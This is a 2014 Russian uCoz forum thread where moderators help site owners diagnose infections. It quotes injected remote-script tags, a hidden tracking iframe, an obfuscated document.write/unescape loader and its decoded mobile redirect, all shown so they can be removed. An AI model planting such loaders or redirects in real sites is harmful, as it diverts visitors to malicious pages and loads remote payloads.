Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Gertryda5537, удалите вредоносный код
Код <script src="http://i1ii.ru/1.js" type="text/javascript"></script> |
|
Мой комп взломали вчера, толи из за одной программы или как то по другому
Я переустановил систему,модем даже сбросил и заного настроил ну а вебмастер яндекс выдает ссылки что у меня на сайте мобильный редирект Ссылка на сайт помеченный http://my-mobi.3dn.ru/load/igry_na_android/ehkshen/robocop/113-1-0-286 Сайт http://my-mobi.3dn.ru А может еще до этого каким то способом был размещен код некий и мой комп подхватил а не подхватит ли сейчас снова ? Антивирус MSE а тот чел тогда чисто компом управлял , писал что я схватил лютый софт и переустановка поможет Сможете найти вредоносный код ? Заранее спасибо!!! Сообщение отредактировал sashar7777 - Воскресенье, 09 Мар 2014, 23:13:49
|
|
Пару дней назад подцепился ко всем сайтам такой вот прикол (код advmakerа):
Код <div> <script type="text/javascript">var statsScrypt=document.createElement("script");statsScrypt.type="text/javascript";statsScrypt.src="http://cnt3.upstats.ru/"+Math.random()+".js?src=1";document.body.appendChild(statsScrypt);</script> <iframe width="1px" height="1px" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no" src="http://am15.net/px.php?rid=46674&d=30&t=html"></iframe> </div> И это не только на моих сайтах и не только на рабочей машине (провайдер ли - пока хз).. Сообщение отредактировал Enein - Понедельник, 10 Мар 2014, 01:59:34
|
|
доброго времени суток пользователи и администрация сайта у меня беда скачал шаблон залил настроил как только запустил от яндекса пришло письмо о том что на сайте обнаружен вреданосный код в чем его была фишка заходил с компа все отлично было заходил с планшета или телефона он автоматом переводил на левые сайты и пытался загрузить флеш плеер после чего сайт вообще заблокирован яндеком пишет что найден код и вот прислал его название
mobile_redirect http://www.privet-android.ru/ вот мой сайт помогите мне отыскать эту тварь и унечтожить зарние спасибо если что пишите на почту sozdamchat@yandex.ru я отблагодарю конечно же чем быстрее тем лучше)))) |
|
stalkerss222222, из кода сайта удалите вот этот скрипт
Код <script type="text/javascript"> <!-document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A% 64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76 %61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%7 3%69%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E')); //--> </script> Добавлено (11 Мар 2014, 20:49:52) Добавлено (11 Мар 2014, 20:52:57) Код <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/jquery.min_raketa.js"></script> <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/MrScrollUp_raketa.js"></script> <link rel="stylesheet" type="text/css" href="http://webo4ka.ru/Ucoz7/MrScrollUp_raketa.css" /> закодированный скрипт выше это мобильный вирус в расскодированном виде выглядит Код <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){ window.location = "http://all-musica.ru/site/go.php?sid=1"; } //--> |
|
Ucoz_fan,
Код <script type="text/javascript" src="http://webo4ka.ru/Ucoz7/jquery.min_raketa.js"></script> |
|
а также в закодированном коде еще есть такой сюрприз который и подгружает сам вирус
Код < script type="text/javascript"> <!-- document.write(unescape('< script type= "text/javascript" src= "http://avataria-vkontakte.ru/js/site.js"> </script>')); //--> </script> Добавлено (11 Мар 2014, 21:17:25) Добавлено (11 Мар 2014, 21:21:31) Цитата webanet (  )это скрипт лить на сайт не стоит |
|
короче как я понял надо удалить эту долбаую ракету с сайта и ту шнягу и все?
только как долго ждать когда яндекс проверит его ? Код < script type="text/javascript"> <!-- document.write(unescape('< script type= "text/javascript" src= "http://avataria-vkontakte.ru/js/site.js"> </script>')); //--> </script> я этот не нашол Сообщение отредактировал stalkerss222222 - Среда, 12 Мар 2014, 09:56:29
|
|
Цитата stalkerss222222 ( )я этот не нашол |
|
я удалил все что вы мне написали за исключением < script type="text/javascript">
<!-- document.write(unescape('< script type= "text/javascript" src= "http://avataria-vkontakte.ru/js/site.js"> </script>')); //--> </script> я это не нашол не на одной странице буду ждать когда его проверят заново Добавлено (12 Мар 2014, 11:15:05) |
|
Цитата stalkerss222222 ( )только как долго ждать когда яндекс проверит его |
|
НеТормози, где адрес сайта? верните коды и дайте ссылку на сайт. по вашему сообщению гадать невозможно. читайте правила подачи заявки
|
|
webanet, Да-да, извиняюсь. Просто это системные коды, может с ними что не так., поэтому ссылку не дал.
Все вернул. В первом контейнере. Сайт Добавлено (14 Мар 2014, 15:42:12) |
|
НеТормози, что пишет аваст когда ругается? дайте полный текст ругани аваста
|
| |||